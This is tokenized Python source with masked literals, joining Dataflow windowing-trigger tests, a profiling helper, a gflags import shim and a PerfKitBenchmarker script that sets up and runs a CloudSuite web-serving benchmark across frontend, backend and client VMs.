IntervalWindow ( <NUM_LIT:30> , <NUM_LIT> ) : [ set ( '<STR_LIT>' ) ] , <EOL> IntervalWindow ( <NUM_LIT:50> , <NUM_LIT> ) : [ set ( '<STR_LIT>' ) ] } , <EOL> <NUM_LIT:1> , <EOL> <NUM_LIT:2> , <EOL> <NUM_LIT:3> ) <EOL> def test_sessions_repeatedly_after_count ( self ) : <EOL> self . run_trigger_simple ( <EOL> Sessions ( <NUM_LIT:10> ) , <EOL> Repeatedly ( AfterCount ( <NUM_LIT:2> ) ) , <EOL> AccumulationMode . ACCUMULATING , <EOL> [ ( <NUM_LIT:1> , '<STR_LIT:a>' ) , ( <NUM_LIT:15> , '<STR_LIT:b>' ) , ( <NUM_LIT:6> , '<STR_LIT:c>' ) , ( <NUM_LIT:2> , '<STR_LIT:d>' ) , ( <NUM_LIT:7> , '<STR_LIT:e>' ) ] , <EOL> { IntervalWindow ( <NUM_LIT:1> , <NUM_LIT> ) : [ set ( '<STR_LIT:abc>' ) , set ( '<STR_LIT>' ) ] } , <EOL> <NUM_LIT:1> , <EOL> <NUM_LIT:3> ) <EOL> self . run_trigger_simple ( <EOL> Sessions ( <NUM_LIT:10> ) , <EOL> Repeatedly ( AfterCount ( <NUM_LIT:2> ) ) , <EOL> AccumulationMode . DISCARDING , <EOL> [ ( <NUM_LIT:1> , '<STR_LIT:a>' ) , ( <NUM_LIT:15> , '<STR_LIT:b>' ) , ( <NUM_LIT:6> , '<STR_LIT:c>' ) , ( <NUM_LIT:2> , '<STR_LIT:d>' ) , ( <NUM_LIT:7> , '<STR_LIT:e>' ) ] , <EOL> { IntervalWindow ( <NUM_LIT:1> , <NUM_LIT> ) : [ set ( '<STR_LIT:abc>' ) , set ( '<STR_LIT>' ) ] } , <EOL> <NUM_LIT:1> , <EOL> <NUM_LIT:3> ) <EOL> def test_sessions_after_each ( self ) : <EOL> self . run_trigger_simple ( <EOL> Sessions ( <NUM_LIT:10> ) , <EOL> AfterEach ( AfterCount ( <NUM_LIT:2> ) , AfterCount ( <NUM_LIT:3> ) ) , <EOL> AccumulationMode . ACCUMULATING , <EOL> zip ( range ( <NUM_LIT:10> ) , '<STR_LIT>' ) , <EOL> { IntervalWindow ( <NUM_LIT:0> , <NUM_LIT:11> ) : [ set ( '<STR_LIT>' ) ] , <EOL> IntervalWindow ( <NUM_LIT:0> , <NUM_LIT:15> ) : [ set ( '<STR_LIT>' ) ] } , <EOL> <NUM_LIT:2> ) <EOL> self . run_trigger_simple ( <EOL> Sessions ( <NUM_LIT:10> ) , <EOL> Repeatedly ( AfterEach ( AfterCount ( <NUM_LIT:2> ) , AfterCount ( <NUM_LIT:3> ) ) ) , <EOL> AccumulationMode . ACCUMULATING , <EOL> zip ( range ( <NUM_LIT:10> ) , '<STR_LIT>' ) , <EOL> { IntervalWindow ( <NUM_LIT:0> , <NUM_LIT:11> ) : [ set ( '<STR_LIT>' ) ] , <EOL> IntervalWindow ( <NUM_LIT:0> , <NUM_LIT:15> ) : [ set ( '<STR_LIT>' ) ] , <EOL> IntervalWindow ( <NUM_LIT:0> , <NUM_LIT> ) : [ set ( '<STR_LIT>' ) ] } , <EOL> <NUM_LIT:2> ) <EOL> class TriggerPipelineTest ( unittest . TestCase ) : <EOL> def test_after_count ( self ) : <EOL> p = Pipeline ( '<STR_LIT>' ) <EOL> result = ( p <EOL> | df . Create ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:10> , <NUM_LIT:11> ] ) <EOL> | df . FlatMap ( lambda t : [ ( '<STR_LIT:A>' , t ) , ( '<STR_LIT:B>' , t + <NUM_LIT:5> ) ] ) <EOL> | df . Map ( lambda ( k , t ) : TimestampedValue ( ( k , t ) , t ) ) <EOL> | df . WindowInto ( FixedWindows ( <NUM_LIT:10> ) , trigger = AfterCount ( <NUM_LIT:3> ) , <EOL> accumulation_mode = AccumulationMode . DISCARDING ) <EOL> | df . GroupByKey ( ) <EOL> | df . Map ( lambda ( k , v ) : ( '<STR_LIT>' % ( k , len ( v ) ) , set ( v ) ) ) ) <EOL> assert_that ( result , equal_to ( <EOL> { <EOL> '<STR_LIT>' : { <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> } , <EOL> '<STR_LIT>' : { <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:8> , <NUM_LIT:9> } , <EOL> '<STR_LIT>' : { <NUM_LIT:10> , <NUM_LIT:15> , <NUM_LIT:16> } , <EOL> } . iteritems ( ) ) ) <EOL> class TranscriptTest ( unittest . TestCase ) : <EOL> @ classmethod <EOL> def _create_test ( cls , spec ) : <EOL> counter = <NUM_LIT:0> <EOL> name = spec . get ( '<STR_LIT:name>' , '<STR_LIT>' ) <EOL> unique_name = '<STR_LIT>' + name <EOL> while hasattr ( cls , unique_name ) : <EOL> counter += <NUM_LIT:1> <EOL> unique_name = '<STR_LIT>' % ( name , counter ) <EOL> setattr ( cls , unique_name , lambda self : self . _run_log_test ( spec ) ) <EOL> @ classmethod <EOL> def _create_tests ( cls , transcript_filename ) : <EOL> for spec in yaml . load_all ( open ( transcript_filename ) ) : <EOL> cls . _create_test ( spec ) <EOL> def _run_log_test ( self , spec ) : <EOL> if '<STR_LIT:error>' in spec : <EOL> self . assertRaisesRegexp ( <EOL> AssertionError , spec [ '<STR_LIT:error>' ] , self . _run_log , spec ) <EOL> else : <EOL> self . _run_log ( spec ) <EOL> def _run_log ( self , spec ) : <EOL> def parse_int_list ( s ) : <EOL> """<STR_LIT>""" <EOL> s = s . strip ( ) <EOL> assert s [ <NUM_LIT:0> ] == '<STR_LIT:[>' and s [ - <NUM_LIT:1> ] == '<STR_LIT:]>' , s <EOL> if not s [ <NUM_LIT:1> : - <NUM_LIT:1> ] . strip ( ) : <EOL> return [ ] <EOL> else : <EOL> return [ int ( x ) for x in s [ <NUM_LIT:1> : - <NUM_LIT:1> ] . split ( '<STR_LIT:U+002C>' ) ] <EOL> def split_args ( s ) : <EOL> """<STR_LIT>""" <EOL> args = [ ] <EOL> start = <NUM_LIT:0> <EOL> depth = <NUM_LIT:0> <EOL> for ix in xrange ( len ( s ) ) : <EOL> c = s [ ix ] <EOL> if c in '<STR_LIT>' : <EOL> depth += <NUM_LIT:1> <EOL> elif c in '<STR_LIT>' : <EOL> depth -= <NUM_LIT:1> <EOL> elif c == '<STR_LIT:U+002C>' and depth == <NUM_LIT:0> : <EOL> args . append ( s [ start : ix ] . strip ( ) ) <EOL> start = ix + <NUM_LIT:1> <EOL> assert depth == <NUM_LIT:0> , s <EOL> args . append ( s [ start : ] . strip ( ) ) <EOL> return args <EOL> def parse ( s , names ) : <EOL> """<STR_LIT>""" <EOL> s = s . strip ( ) <EOL> if s in names : <EOL> return names [ s ] <EOL> elif s [ <NUM_LIT:0> ] == '<STR_LIT:[>' : <EOL> return parse_int_list ( s ) <EOL> elif '<STR_LIT:(>' in s : <EOL> assert s [ - <NUM_LIT:1> ] == '<STR_LIT:)>' , s <EOL> callee = parse ( s [ : s . index ( '<STR_LIT:(>' ) ] , names ) <EOL> posargs = [ ] <EOL> kwargs = { } <EOL> for arg in split_args ( s [ s . index ( '<STR_LIT:(>' ) + <NUM_LIT:1> : - <NUM_LIT:1> ] ) : <EOL> if '<STR_LIT:=>' in arg : <EOL> kw , value = arg . split ( '<STR_LIT:=>' , <NUM_LIT:1> ) <EOL> kwargs [ kw ] = parse ( value , names ) <EOL> else : <EOL> posargs . append ( parse ( arg , names ) ) <EOL> return callee ( * posargs , ** kwargs ) <EOL> else : <EOL> try : <EOL> return int ( s ) <EOL> except ValueError : <EOL> raise ValueError ( '<STR_LIT>' % s ) <EOL> def parse_fn ( s , names ) : <EOL> """<STR_LIT>""" <EOL> fn = parse ( s , names ) <EOL> if isinstance ( fn , type ) : <EOL> return fn ( ) <EOL> else : <EOL> return fn <EOL> from google . cloud . dataflow . transforms import window as window_module <EOL> from google . cloud . dataflow . transforms import trigger as trigger_module <EOL> window_fn_names = dict ( window_module . __dict__ ) <EOL> window_fn_names . update ( { '<STR_LIT>' : <EOL> CustomTimestampingFixedWindowsWindowFn } ) <EOL> trigger_names = { '<STR_LIT>' : DefaultTrigger } <EOL> trigger_names . update ( trigger_module . __dict__ ) <EOL> window_fn = parse_fn ( spec . get ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> window_fn_names ) <EOL> trigger_fn = parse_fn ( spec . get ( '<STR_LIT>' , '<STR_LIT>' ) , trigger_names ) <EOL> accumulation_mode = getattr ( <EOL> AccumulationMode , spec . get ( '<STR_LIT>' , '<STR_LIT>' ) . upper ( ) ) <EOL> output_time_fn = getattr ( <EOL> OutputTimeFn , spec . get ( '<STR_LIT>' , '<STR_LIT>' ) . upper ( ) ) <EOL> allowed_lateness = float ( spec . get ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> driver = GeneralTriggerDriver ( <EOL> Windowing ( window_fn , trigger_fn , accumulation_mode , output_time_fn ) ) <EOL> state = InMemoryUnmergedState ( ) <EOL> output = [ ] <EOL> watermark = MIN_TIMESTAMP <EOL> def fire_timers ( ) : <EOL> to_fire = state . get_and_clear_timers ( watermark ) <EOL> while to_fire : <EOL> for timer_window , ( name , time_domain , t_timestamp ) in to_fire : <EOL> for wvalue in driver . process_timer ( <EOL> timer_window , name , time_domain , t_timestamp , state ) : <EOL> window , = wvalue . windows <EOL> output . append ( { '<STR_LIT>' : [ window . start , window . end - <NUM_LIT:1> ] , <EOL> '<STR_LIT>' : sorted ( wvalue . value ) , <EOL> '<STR_LIT>' : wvalue . timestamp } ) <EOL> to_fire = state . get_and_clear_timers ( watermark ) <EOL> for line in spec [ '<STR_LIT>' ] : <EOL> action , params = line . items ( ) [ <NUM_LIT:0> ] <EOL> if action != '<STR_LIT>' : <EOL> self . assertEquals ( <EOL> [ ] , output , msg = '<STR_LIT>' % ( output , line ) ) <EOL> if action == '<STR_LIT:input>' : <EOL> bundle = [ <EOL> WindowedValue ( t , t , window_fn . assign ( WindowFn . AssignContext ( t , t ) ) ) <EOL> for t in params ] <EOL> output = [ { '<STR_LIT>' : [ wvalue . windows [ <NUM_LIT:0> ] . start , <EOL> wvalue . windows [ <NUM_LIT:0> ] . end - <NUM_LIT:1> ] , <EOL> '<STR_LIT>' : sorted ( wvalue . value ) , <EOL> '<STR_LIT>' : wvalue . timestamp } <EOL> for wvalue <EOL> in driver . process_elements ( state , bundle , watermark ) ] <EOL> fire_timers ( ) <EOL> elif action == '<STR_LIT>' : <EOL> watermark = params <EOL> fire_timers ( ) <EOL> elif action == '<STR_LIT>' : <EOL> for expected_output in params : <EOL> for candidate in output : <EOL> if all ( candidate [ k ] == expected_output [ k ] <EOL> for k in candidate if k in expected_output ) : <EOL> output . remove ( candidate ) <EOL> break <EOL> else : <EOL> self . fail ( '<STR_LIT>' % ( expected_output , output ) ) <EOL> elif action == '<STR_LIT:state>' : <EOL> pass <EOL> else : <EOL> self . fail ( '<STR_LIT>' + action ) <EOL> self . assertEquals ( [ ] , output , msg = '<STR_LIT>' % output ) <EOL> TRANSCRIPT_TEST_FILE = os . path . join ( os . path . dirname ( __file__ ) , <EOL> '<STR_LIT>' ) <EOL> if os . path . exists ( TRANSCRIPT_TEST_FILE ) : <EOL> TranscriptTest . _create_tests ( TRANSCRIPT_TEST_FILE ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> import cProfile <EOL> import logging <EOL> import os <EOL> import pstats <EOL> import StringIO <EOL> import tempfile <EOL> import time <EOL> from google . cloud . dataflow . utils . dependency import _dependency_file_copy <EOL> class Profile ( object ) : <EOL> """<STR_LIT>""" <EOL> SORTBY = '<STR_LIT>' <EOL> def __init__ ( self , profile_id , profile_location = None , log_results = False ) : <EOL> self . stats = None <EOL> self . profile_id = str ( profile_id ) <EOL> self . profile_location = profile_location <EOL> self . log_results = log_results <EOL> def __enter__ ( self ) : <EOL> logging . info ( '<STR_LIT>' , self . profile_id ) <EOL> self . profile = cProfile . Profile ( ) <EOL> self . profile . enable ( ) <EOL> return self <EOL> def __exit__ ( self , * args ) : <EOL> self . profile . disable ( ) <EOL> logging . info ( '<STR_LIT>' , self . profile_id ) <EOL> if self . profile_location : <EOL> dump_location = os . path . join ( <EOL> self . profile_location , '<STR_LIT>' , <EOL> ( '<STR_LIT>' % ( time . strftime ( '<STR_LIT>' ) , self . profile_id ) ) ) <EOL> fd , filename = tempfile . mkstemp ( ) <EOL> self . profile . dump_stats ( filename ) <EOL> logging . info ( '<STR_LIT>' , dump_location ) <EOL> _dependency_file_copy ( filename , dump_location ) <EOL> os . close ( fd ) <EOL> os . remove ( filename ) <EOL> if self . log_results : <EOL> s = StringIO . StringIO ( ) <EOL> self . stats = pstats . Stats ( <EOL> self . profile , stream = s ) . sort_stats ( Profile . SORTBY ) <EOL> self . stats . print_stats ( ) <EOL> logging . info ( '<STR_LIT>' , s . getvalue ( ) ) </s>
<s> import gflags as flags <EOL> try : <EOL> from gflags import validators as flags_validators <EOL> except ImportError : <EOL> from gflags import gflags_validators as flags_validators </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> import posixpath <EOL> import re <EOL> import time <EOL> from perfkitbenchmarker import configs <EOL> from perfkitbenchmarker import sample <EOL> from perfkitbenchmarker import vm_util <EOL> from perfkitbenchmarker import flags <EOL> from perfkitbenchmarker . linux_packages import nginx <EOL> from perfkitbenchmarker . linux_packages import php <EOL> BASE_DIR = posixpath . join ( vm_util . VM_TMP_DIR , '<STR_LIT>' ) <EOL> CATALINA_HOME = '<STR_LIT>' % BASE_DIR <EOL> OLIO_HOME = '<STR_LIT>' % BASE_DIR <EOL> FABAN_HOME = '<STR_LIT>' % BASE_DIR <EOL> MYSQL_HOME = '<STR_LIT>' % BASE_DIR <EOL> GEOCODER_HOME = '<STR_LIT>' % BASE_DIR <EOL> APP_DIR = '<STR_LIT>' % BASE_DIR <EOL> JAVA_HOME = '<STR_LIT>' <EOL> PHPRC = posixpath . join ( APP_DIR , '<STR_LIT>' ) <EOL> OUTPUT_DIR = posixpath . join ( vm_util . VM_TMP_DIR , '<STR_LIT>' ) <EOL> ANT_HOME = posixpath . join ( vm_util . VM_TMP_DIR , '<STR_LIT>' ) <EOL> OLIO_BUILD = '<STR_LIT>' % BASE_DIR <EOL> MY_CNF = '<STR_LIT>' <EOL> NGINX_CONF = '<STR_LIT>' % BASE_DIR <EOL> flags . DEFINE_integer ( '<STR_LIT>' , <NUM_LIT:100> , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , lower_bound = <NUM_LIT:2> ) <EOL> FLAGS = flags . FLAGS <EOL> BENCHMARK_NAME = '<STR_LIT>' <EOL> BENCHMARK_CONFIG = """<STR_LIT>""" <EOL> def _SetupFrontend ( benchmark_spec ) : <EOL> frontend = benchmark_spec . vm_groups [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> backend = benchmark_spec . vm_groups [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> frontend . Install ( '<STR_LIT>' ) <EOL> frontend . RemoteCommand ( '<STR_LIT>' <EOL> % ( '<STR_LIT>' , re . escape ( APP_DIR ) , NGINX_CONF ) ) <EOL> frontend . RemoteCommand ( '<STR_LIT>' % NGINX_CONF ) <EOL> frontend . RemoteCommand ( '<STR_LIT>' % APP_DIR ) <EOL> frontend . RemoteCommand ( '<STR_LIT>' <EOL> % ( BASE_DIR ) ) <EOL> frontend . RemoteCommand ( '<STR_LIT>' <EOL> % ( OLIO_HOME , APP_DIR ) ) <EOL> frontend . RemoteCommand ( '<STR_LIT>' % ( BASE_DIR , APP_DIR ) ) <EOL> frontend . RemoteCommand ( '<STR_LIT>' % APP_DIR ) <EOL> frontend . RemoteCommand ( '<STR_LIT>' <EOL> % ( '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> % backend . ip_address , APP_DIR ) ) <EOL> frontend . RemoteCommand ( '<STR_LIT>' <EOL> % ( '<STR_LIT>' , <EOL> '<STR_LIT>' , APP_DIR ) ) <EOL> frontend . RemoteCommand ( '<STR_LIT>' <EOL> % ( '<STR_LIT>' , <EOL> '<STR_LIT>' , APP_DIR ) ) <EOL> frontend . RemoteCommand ( '<STR_LIT>' <EOL> % ( '<STR_LIT>' , backend . ip_address , APP_DIR ) ) <EOL> frontend . Install ( '<STR_LIT>' ) <EOL> php . ConfigureAndBuild ( frontend , PHPRC , True ) <EOL> frontend . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> frontend . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % PHPRC ) <EOL> frontend . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % PHPRC ) <EOL> frontend . RemoteCommand ( '<STR_LIT>' <EOL> % ( '<STR_LIT>' , '<STR_LIT>' , PHPRC ) ) <EOL> frontend . RemoteCommand ( '<STR_LIT>' <EOL> % ( '<STR_LIT>' , '<STR_LIT>' , <EOL> PHPRC ) ) <EOL> php . InstallAPC ( frontend ) <EOL> def _SetupFilestore ( vm ) : <EOL> filestore = posixpath . join ( vm . GetScratchDir ( ) , '<STR_LIT>' ) <EOL> vm . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % ( APP_DIR , BASE_DIR , filestore , filestore , <EOL> FABAN_HOME ) ) <EOL> vm . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % ( filestore , JAVA_HOME , FABAN_HOME , filestore ) ) <EOL> frontend . RemoteCommand ( '<STR_LIT>' <EOL> % ( '<STR_LIT>' , <EOL> '<STR_LIT>' % re . escape ( filestore ) , <EOL> APP_DIR ) ) <EOL> _SetupFilestore ( frontend ) <EOL> frontend . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> nginx . Start ( frontend , frontend . firewall ) <EOL> def _SetupBackend ( benchmark_spec ) : <EOL> frontend = benchmark_spec . vm_groups [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> backend = benchmark_spec . vm_groups [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> client_ip = benchmark_spec . vm_groups [ '<STR_LIT>' ] [ <NUM_LIT:0> ] . ip_address <EOL> frontend_ip = frontend . ip_address <EOL> backend . Install ( '<STR_LIT>' ) <EOL> untar_command = ( '<STR_LIT>' ) <EOL> backend . RemoteCommand ( untar_command % <EOL> ( BASE_DIR , '<STR_LIT>' ) ) <EOL> copy_command = ( '<STR_LIT>' ) <EOL> backend . RemoteCommand ( copy_command % ( MYSQL_HOME , MY_CNF ) ) <EOL> db_install_command = ( '<STR_LIT>' ) <EOL> backend . RemoteCommand ( db_install_command % ( MYSQL_HOME ) ) <EOL> backend . RobustRemoteCommand ( '<STR_LIT>' % MYSQL_HOME ) <EOL> logging . info ( '<STR_LIT>' ) <EOL> time . sleep ( <NUM_LIT:30> ) <EOL> sql_cmd = '<STR_LIT>' <EOL> backend . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' % ( MYSQL_HOME , sql_cmd ) ) <EOL> backend . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % ( MYSQL_HOME , frontend_ip ) ) <EOL> backend . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % ( MYSQL_HOME , FABAN_HOME ) ) <EOL> populate_db_command = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT:%s>' ) <EOL> backend . RobustRemoteCommand ( populate_db_command <EOL> % ( JAVA_HOME , FABAN_HOME , <EOL> FLAGS . cloudsuite_web_serving_load_scale ) ) <EOL> backend . RemoteCommand ( untar_command % <EOL> ( BASE_DIR , '<STR_LIT>' ) ) <EOL> backend . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' % ( BASE_DIR ) ) <EOL> build_tomcat = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> backend . InstallPackages ( '<STR_LIT>' ) <EOL> backend . RemoteCommand ( build_tomcat % ( JAVA_HOME , CATALINA_HOME ) ) <EOL> backend . RemoteCommand ( '<STR_LIT>' % GEOCODER_HOME ) <EOL> backend . RemoteCommand ( '<STR_LIT>' % <EOL> ( client_ip , OLIO_HOME , GEOCODER_HOME ) ) <EOL> backend . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' % GEOCODER_HOME ) <EOL> editor_command = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> backend . RemoteCommand ( editor_command % <EOL> ( '<STR_LIT>' , <EOL> GEOCODER_HOME ) ) <EOL> backend . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % ( GEOCODER_HOME , ANT_HOME , CATALINA_HOME ) ) <EOL> run_tomcat = ( '<STR_LIT>' ) <EOL> backend . RemoteCommand ( run_tomcat % CATALINA_HOME ) <EOL> def _SetupClient ( benchmark_spec ) : <EOL> frontend = benchmark_spec . vm_groups [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> backend = benchmark_spec . vm_groups [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> client = benchmark_spec . vm_groups [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> fw = client . firewall <EOL> fw . AllowPort ( client , <NUM_LIT> ) <EOL> CLIENT_IP = client . ip_address <EOL> BACKEND_IP = backend . ip_address <EOL> FRONTEND_IP = frontend . ip_address <EOL> untar_command = ( '<STR_LIT>' ) <EOL> client . RemoteCommand ( untar_command % ( BASE_DIR , '<STR_LIT>' ) ) <EOL> client . RemoteCommand ( untar_command % <EOL> ( BASE_DIR , '<STR_LIT>' ) ) <EOL> client . RemoteCommand ( untar_command % <EOL> ( BASE_DIR , '<STR_LIT>' ) ) <EOL> client . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % ( BASE_DIR , OLIO_HOME ) ) <EOL> copy_command2 = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> client . RemoteCommand ( copy_command2 % ( FABAN_HOME , FABAN_HOME , <EOL> FABAN_HOME , FABAN_HOME , FABAN_HOME , <EOL> FABAN_HOME ) ) <EOL> client . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % OLIO_HOME ) <EOL> client . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % ( re . escape ( FABAN_HOME ) , OLIO_HOME ) ) <EOL> client . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % OLIO_HOME ) <EOL> build_command = ( '<STR_LIT>' ) <EOL> client . RemoteCommand ( build_command % ( OLIO_BUILD , ANT_HOME ) ) <EOL> client . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' % ( OLIO_HOME , FABAN_HOME ) ) <EOL> set_java = ( '<STR_LIT>' ) <EOL> client . RemoteCommand ( set_java % ( JAVA_HOME , FABAN_HOME ) ) <EOL> client . Install ( '<STR_LIT>' ) <EOL> client . RemoteCommand ( '<STR_LIT>' % CLIENT_IP ) <EOL> client . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % BASE_DIR ) <EOL> client . RobustRemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % ( FABAN_HOME , BASE_DIR , BASE_DIR , BASE_DIR , <EOL> OLIO_BUILD , OLIO_BUILD , OLIO_BUILD , <EOL> FABAN_HOME ) ) <EOL> client . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % ( CLIENT_IP , FABAN_HOME ) ) <EOL> client . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % ( FRONTEND_IP , FABAN_HOME ) ) <EOL> client . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % ( re . escape ( MYSQL_HOME ) , FABAN_HOME ) ) <EOL> client . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % ( re . escape ( OUTPUT_DIR ) , FABAN_HOME ) ) <EOL> filestore = posixpath . join ( frontend . GetScratchDir ( ) , '<STR_LIT>' ) <EOL> client . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % ( re . escape ( filestore ) , FABAN_HOME ) ) <EOL> client . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % ( BACKEND_IP , FABAN_HOME ) ) <EOL> def GetConfig ( user_config ) : <EOL> return configs . LoadConfig ( BENCHMARK_CONFIG , user_config , BENCHMARK_NAME ) <EOL> def CheckPrerequisites ( ) : <EOL> """<STR_LIT>""" <EOL> if FLAGS [ '<STR_LIT>' ] . present and FLAGS . num_vms < <NUM_LIT:3> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> def PreparePrivateKey ( vm ) : <EOL> vm . AuthenticateVm ( ) <EOL> def _PrepareVms ( vm ) : <EOL> vm . Install ( '<STR_LIT>' ) <EOL> vm . Install ( '<STR_LIT>' ) <EOL> vm . Install ( '<STR_LIT>' ) <EOL> vm . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % vm_util . VM_TMP_DIR ) <EOL> def Prepare ( benchmark_spec ) : <EOL> """<STR_LIT>""" <EOL> frontend = benchmark_spec . vm_groups [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> backend = benchmark_spec . vm_groups [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> client = benchmark_spec . vm_groups [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> vms = benchmark_spec . vms <EOL> vm_util . RunThreaded ( PreparePrivateKey , vms ) <EOL> vm_util . RunThreaded ( _PrepareVms , vms ) <EOL> frontend . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % BASE_DIR ) <EOL> _SetupClient ( benchmark_spec ) <EOL> frontend . RemoteCommand ( '<STR_LIT>' % <EOL> ( client . ip_address , FABAN_HOME , BASE_DIR ) ) <EOL> backend . RemoteCommand ( '<STR_LIT>' % <EOL> ( client . ip_address , FABAN_HOME , BASE_DIR ) ) <EOL> setup_functions = [ _SetupBackend , _SetupFrontend ] <EOL> vm_util . RunThreaded ( lambda f : f ( benchmark_spec ) , setup_functions ) <EOL> def ParseOutput ( client ) : <EOL> stdout , _ = client . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' % OUTPUT_DIR ) <EOL> ops_per_sec = re . findall ( r'<STR_LIT>' , stdout ) <EOL> sum_ops_per_sec = <NUM_LIT:0.0> <EOL> for value in ops_per_sec : <EOL> sum_ops_per_sec += float ( value ) <EOL> sum_ops_per_sec /= <NUM_LIT:2> <EOL> latency = re . findall ( r'<STR_LIT>' , stdout ) <EOL> latency99 = re . findall ( r'<STR_LIT>' , stdout ) <EOL> return sum_ops_per_sec , latency , latency99 <EOL> def Run ( benchmark_spec ) : <EOL> client = benchmark_spec . vm_groups [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> set_faban_home = ( '<STR_LIT>' ) <EOL> client . RobustRemoteCommand ( set_faban_home % ( FABAN_HOME , FABAN_HOME ) ) <EOL> results = [ ] <EOL> sum_ops_per_sec , latency , latency99 = ParseOutput ( client ) <EOL> results . append ( sample . Sample ( '<STR_LIT>' , <EOL> sum_ops_per_sec , '<STR_LIT>' ) ) <EOL> results . append ( sample . Sample ( '<STR_LIT>' , <EOL> float ( latency [ <NUM_LIT:0> ] ) , '<STR_LIT>' ) ) <EOL> results . append ( sample . Sample ( '<STR_LIT>' , <EOL> float ( latency99 [ <NUM_LIT:0> ] ) , '<STR_LIT>' ) ) <EOL> return results <EOL> def Cleanup ( benchmark_spec ) : <EOL> """<STR_LIT>""" <EOL> backend = benchmark_spec . vm_groups [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> client = benchmark_spec . vm_groups [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> set_java = ( '<STR_LIT>' ) <EOL> client . RemoteCommand ( set_java % ( JAVA_HOME , FABAN_HOME ) ) <EOL> backend . RemoteCommand ( '<STR_LIT>' % MYSQL_HOME ) <EOL> _CleanupFrontend ( benchmark_spec ) <EOL> def _CleanupFrontend ( benchmark_spec ) : <EOL> frontend = benchmark_spec . vm_groups [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> frontend . RemoteCommand ( '<STR_LIT>' ) <EOL> nginx . Stop ( frontend ) <EOL> filestore = posixpath . join ( frontend . GetScratchDir ( ) , '<STR_LIT>' ) <EOL> frontend . RemoteCommand ( '<STR_LIT>' % filestore ) </s>
